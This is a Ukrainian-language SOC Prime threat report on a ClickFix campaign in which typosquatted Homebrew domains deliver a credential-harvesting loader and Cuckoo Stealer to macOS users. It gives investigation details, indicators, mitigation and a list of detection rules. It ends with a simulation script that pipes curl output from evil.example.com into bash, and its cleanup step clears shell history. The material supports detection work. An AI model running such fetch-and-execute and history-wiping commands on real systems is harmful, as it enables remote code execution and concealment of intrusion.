SOC Prime Bias: Середній

18 Feb 2026 14:39 UTC

Фейкові Homebrew Типосквати Використовуються для Доставки Cuckoo Stealer через ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Фейкові Homebrew Типосквати Використовуються для Доставки Cuckoo Stealer через ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

У звіті описується кампанія, яка зловживає помилково написаними доменами Homebrew, щоб заманити розробників macOS виконувати шкідливі команди «install» за допомогою техніки ClickFix. Сформований однорядковий запит curl відправляє жертв у підконтрольну атакуючим інфраструктуру, доставляючи завантажувач для збирання облікових даних, а потім Cuckoo Stealer. Шкідливе програмне забезпечення зберігається через LaunchAgent, видаляє атрибути карантину і ексфільтрує облікові дані та дані гаманця через HTTPS. Виявлення слід зосередити на шаблонах команд curl і пов’язаній з ними інфраструктурі.

Розслідування

Дослідники простежили початкову принаду до homabrews.org, що розташовується на 5.255.123.244 в Нідерландах і розміщує кілька схожих доменів (включаючи raw.homabrews.org, який використовується для доставки). Завантажений скрипт запускає цикл dscl authonly для перевірки облікових даних macOS, потім отримує бінарний файл під назвою brew_agent. На другій стадії Cuckoo Stealer створює LaunchAgent plist, видаляє прапори карантину і спілкується з C2, використовуючи X25519 обмін ключами з XOR-зашифрованими навантаженнями. Мисливство за інфраструктурою виявило мережу щонайменше з шести доменів, що розділяють той же хостинг IP.

Пом’якшення

Навчіть розробників перевіряти URLs установки Homebrew і уникати копіювання та вставки ненадійних команд у Terminal. Увімкніть журналювання командного рядка і обмежте шаблони, де curl завантажує віддалені скрипти для негайного виконання, особливо такі, як «curl | sh». Захист кінцевих точок повинен попереджати про підозріле створення LaunchAgent і видалення атрибутів карантину. Мережевий захист повинен блокувати відомі шкідливі домени і позначати трафік до raw.homabrews.org та пов’язаних хостів.

Реагування

Коли виявляється підозріла команда curl, ізолюйте кінцеву точку, захопіть скрипт і двійковий brew_agent, зберіть plist LaunchAgent для аналізу. Скиньте збережені облікові дані і відкличте скомпрометовані токени, особливо для браузерів, Keychain та криптовалютних гаманців. Проведіть форензичний огляд прихованої директорії BrewUpdater, будь-яких створених ярликів і видаліть шкідливі файли. Оновіть виявлення з витягнутими IOC і стежте за повторним використанням тієї ж інфраструктури.

Потік атаки

Виявлення

Підозріла активність Keychain (через process_creation)

Команда SOC Prime
18 лютого 2026 р.

Підозріла зміна дозволів файлів у тимчасовій папці MacOS (через cmdline)

Команда SOC Prime
18 лютого 2026 р.

Підозрілі розташування та назви Plist на MacOS (через file_event)

Команда SOC Prime
18 лютого 2026 р.

Підозрілий доступ до збережених облікових даних браузера на MacOS (через process_creation)

Команда SOC Prime
18 лютого 2026 р.

Звук системного диска MacOS було вимкнено за допомогою Osascript (через cmdline)

Команда SOC Prime
18 лютого 2026 р.

Можливий збір за допомогою MacOS спроби виконання Screencapture (через cmdline)

Команда SOC Prime
18 лютого 2026 р.

Підозріла спроба виконання Curl [MacOS] (через cmdline)

Команда SOC Prime
18 лютого 2026 р.

IOCs (HashSha256) для виявлення: підробки Homebrew, використані для доставки Cuckoo Stealer через ClickFix

Правила AI SOC Prime
18 лютого 2026 р.

IOCs (SourceIP) для виявлення: підробки Homebrew, використані для доставки Cuckoo Stealer через ClickFix

Правила AI SOC Prime
18 лютого 2026 р.

IOCs (DestinationIP) для виявлення: підробки Homebrew, використані для доставки Cuckoo Stealer через ClickFix

Правила AI SOC Prime
18 лютого 2026 р.

Виявлення шкідливої команди установки macOS через ClickFix [Linux Process Creation]

Правила AI SOC Prime
18 лютого 2026 р.

Детекція домену та шкідливого IP у кампанії ClickFix [Network Indicators]

Правила AI SOC Prime
18 лютого 2026 р.

Виконання симуляції

Пререквізит: телеметрія та контрольний список базової перевірки повинні бути пройдені.

Обґрунтування: У цьому розділі детально описується точне виконання техніки атаки (TTP), призначене для запуску правила виявлення. Команди та розповіді ПОВИННІ безпосередньо відображати ідентифіковані TTP та націлюватися на генерацію точної телеметрії, яку очікує логіка виявлення. Абстрактні або не пов’язані приклади приведуть до помилкової діагностики.

  • Розповідь та команди атаки:
    Атакуючий отримав шкідливий скрипт, закодований у PowerShell і розміщений на сервері C2. Щоб уникнути запису файлів на диск, атакуючий передає скрипт безпосередньо в оболонку Bash, використовуючи curl -fsSL та -c прапорець. Команда виконана інтерактивно з облікового запису скомпрометованого користувача, імітуючи легітимний «click-fix» інсталятор. Кроки такі:

    1. Визначте URL-адресу шкідливого навантаження (наприклад, https://evil.example.com/payload.sh).
    2. Передайте завантаження у Bash, наказуючи Bash виконати вміст за допомогою -c.
    3. Завантаження виконує збір облікових даних, створює прихований файл, а потім видаляє тимчасовий скрипт (охоплюючи T1070.004).
  • Сценарій регресійного тесту:

    #!/usr/bin/env bash
    # -------------------------------------------------
    # Сімулюйте шкідливий інсталятор macOS (стиль ClickFix)
    # -------------------------------------------------
    set -euo pipefail
    
    MALICIOUS_URL="https://evil.example.com/payload.sh"
    
    # Передайте навантаження безпосередньо в Bash з -c
    curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)"
    
    # Припускається, що саме навантаження виконує свої шкідливі дії.
    # З метою тесту ми просто виведемо маркер.
    echo "Шкідливе навантаження виконано"
  • Очисткі команди:

    # Видаліть усі файли, які могли бути створені навантаженням
    rm -f /tmp/payload.sh
    # За бажанням, очистіть історію команд, щоб зменшити форензичні сліди
    history -c